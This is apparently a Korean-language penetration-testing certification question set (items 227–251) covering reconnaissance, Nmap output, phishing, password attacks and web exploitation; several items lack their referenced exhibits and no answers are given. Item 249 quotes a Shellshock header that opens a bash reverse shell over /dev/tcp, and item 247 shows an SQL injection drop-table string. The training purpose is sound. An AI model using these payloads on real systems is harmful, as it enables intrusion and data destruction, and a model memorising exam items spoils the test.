질문 227
침투 테스트 보고서의 다음 중 발견된 취약점과 영향을 받는 시스템 또는 네트워크에 대한 전반적인 위협을 정규화되고 표준화된 방식으로 표현하는 것을 목표로 하는 요소는 무엇인가요?

질문 228
모의 침투 테스터가 새로운 클라이언트와 함께 범위 지정 문서를 작업하고 있습니다. 클라이언트가 사용하는 방법론에는 다음이 포함됩니다:
참여 전 상호 작용(범위 설정 및 ROE)
정보 수집(정찰)
위협 모델링
취약점 분석
익스플로잇 및 익스플로잇 후
보고
다음 중 클라이언트가 사용하는 방법론은 무엇인가요?

질문 229
귀하는 서버에서 포트 스캔을 실행하는 모의 침투 테스터입니다.
지침
파트 1: 1부: 출력이 주어지면 사용 가능한 옵션에서 이 출력을 생성하는 데 사용된 명령을 작성합니다.
2단계: 명령이 적절하게 구성되면 주어진 출력을 사용하여 추가로 조사해야 할 잠재적 공격 경로를 식별합니다.
언제든지 시뮬레이션의 초기 상태로 되돌리려면 모두 초기화 버튼을 클릭하세요.

질문 230
모의 침투 테스터는 공격자가 물리적 접근 제어 시스템에 사용되는 특수 TCP 서비스를 통해 문을 열 수 있는 취약점을 찾고 있습니다. 이 서비스는 100개 이상의 서로 다른 호스트에 존재하므로 테스터는 평가를 자동화하고자 합니다. 이를 식별하려면 모의 침투 테스터가 다음을 수행해야 합니다:
전체 TCP 연결 상태 유지
'안녕하세요' 페이로드 보내기
Walt의 답변
16바이트보다 긴 문자열 보내기
다음 중 이 목표를 가장 잘 지원하는 접근 방식은 무엇인가요?

질문 231
모의 침투 테스터가 웹 애플리케이션 평가를 위해 정찰을 수행하고 있습니다. 조사 후 테스터는 robots.txt 파일에서 관심 있는 항목을 검토합니다.
지침
추가 조사를 위해 침투 테스터가 사용해야 하는 도구를 선택합니다.
침투 테스터가 제거를 권장해야 하는 robots.txt 파일에서 두 개의 항목을 선택합니다.

질문 232
모의 침투 테스터가 표적과 FTP 프로토콜이 있는 서버 사이에 온패스 공격으로 워크스테이션을 배포하여 FTP 자격 증명을 얻고자 합니다. 다음 중 이 목적을 달성하는 데 가장 적합한 방법은 무엇인가요?

질문 233
침투 테스터는 Nmap 스캔에서 다음과 같은 결과를 받습니다:

다음 중 타겟이 실행 중일 가능성이 가장 높은 OS는 무엇인가요?

질문 234
모의 침투 테스터는 회사 운영에 대한 중단을 최소화해야 하는 고객을 위한 활동을 준비 중입니다. 다음 중 수동적 정찰 도구로 간주되는 것은 무엇인가요? (두 가지를 선택하세요.)

질문 235
침투 테스트자가 낮은 권한의 리버스 셸을 얻은 후 다음 명령을 실행합니다: wmic service get name,pathname,startmode 다음 중 침투 테스트자가 이 명령을 실행한 가장 가능성이 높은 이유는 무엇입니까?

질문 236
다음 결과는 공개 은행 웹사이트에서 정찰한 결과입니다:

이 결과를 바탕으로 다음 중 성공 가능성이 가장 높은 공격은 무엇인가요?

질문 237
모의 침투 테스터가 Nmap을 사용하여 호스트 64.13.134.52를 스캔한 결과 다음과 같은 결과를 받았습니다:

결과에 따르면 다음 중 악용될 가능성이 가장 높은 서비스는 무엇인가요? (두 개를 선택하세요.)

질문 238
Nmap 스캔 결과는 다음과 같습니다:

다음 중 이 장치에 대한 가장 좋은 결론은 무엇인가요?

질문 239
웹 애플리케이션 테스트를 수행하는 모의 침투 테스터가 금융 데이터에 대한 로그인 페이지와 관련된 클릭재킹 취약점을 발견했습니다. 이 취약점을 성공적으로 익스플로잇하기 위해 테스터가 이 정보로 수행해야 하는 작업은 다음 중 어느 것입니까?

질문 240
다음 중 모의 침투 테스터가 여러 스레드를 사용하여 SSH를 통해 사용자 비밀번호를 무차별 대입하는 데 사용할 수 있는 도구는 무엇인가요?

질문 241
침투 테스터는 Nmap 스캔에서 다음과 같은 결과를 받습니다:

다음 중 타겟이 실행 중일 가능성이 가장 높은 OS는 무엇인가요?

질문 242
모의 침투 테스터가 계정을 잠그지 않고 도메인에 있는 모든 계정의 비밀번호를 찾으려고 합니다. 다음 중 테스터가 사용해야 하는 명령은 무엇인가요?

질문 243
일반 IT 서버와 산업 제어 시스템을 포함하는 하이브리드 네트워크 세그먼트에서 취약성 스캐너를 실행합니다:

질문 244
모의 침투 테스트 담당자가 다가오는 모의 침투 테스트를 위해 다음과 같은 피싱 이메일을 준비했습니다:

다음 중 피싱 대상이 링크를 클릭하도록 유도하기 위해 MOST를 사용하는 침투 테스트는 무엇인가요?

질문 245
모의 침투 테스터가 전기 자동차를 제어하는 키 포브를 제어하기 위해 경로 링크 계층 공격을 수행 중입니다. 다음 중 모의 침투 테스터가 공격에 성공할 수 있는 무선 공격은 어느 것입니까?

질문 246
시스템을 손상시킨 후 침투 테스터는 다음에 취할 조치를 결정하기 위해 더 많은 정보를 원합니다. 테스터는 다음 명령을 실행합니다:

다음 중 침투 테스트자가 수행하려고 할 가능성이 가장 높은 공격은 무엇인가요?

질문 247
모의 침투 테스터가 웹 서버에서 평가를 수행했습니다. 이 세션의 로그는 다음을 보여줍니다:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; 드롭 테이블 서비스; -
다음 중 어떤 공격이 시도되고 있나요?

질문 248
평가 중에 모의 침투 테스터가 Aircrack-ng을 실행하는 노트북을 사용하여 건물 외부에서 조직의 무선 네트워크에 액세스할 수 있었습니다. 이 문제를 해결하기 위해 고객에게 권장해야 하는 것은 다음 중 어느 것입니까?

질문 249
모의 침투 테스터가 10.10.1.1에서 취약한 웹 서버를 발견합니다. 그런 다음 테스터는 웹 익스플로잇을 전송하는 Python 스크립트를 편집하고 다음 코드를 발견합니다:
exploits = {"사용자-에이전트": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} 다음 중 테스터가 서버가 실행되는 사용자 컨텍스트를 확인하기 위해 스크립트를 수정해야 하는 것은 무엇인가요?

질문 250
모의 침투 테스트의 정찰 단계에서 모의 침투 테스터가 공개적으로 사용 가능한 데이터 유출에서 비밀번호를 발견했습니다. 다음 중 테스터가 취해야 할 최선의 조치는 무엇인가요?

질문 251
웹 브라우저를 통해 클라이언트의 웹 사이트를 검토하는 모의 침투 테스터입니다.
지침
브라우저를 통해 웹사이트의 모든 구성 요소를 검토하여 취약점이 있는지 확인합니다.
인증서, 소스 또는 쿠키에서 가장 높은 취약점만 수정합니다.
언제든지 시뮬레이션의 초기 상태로 되돌리려면 모두 초기화 버튼을 클릭하세요.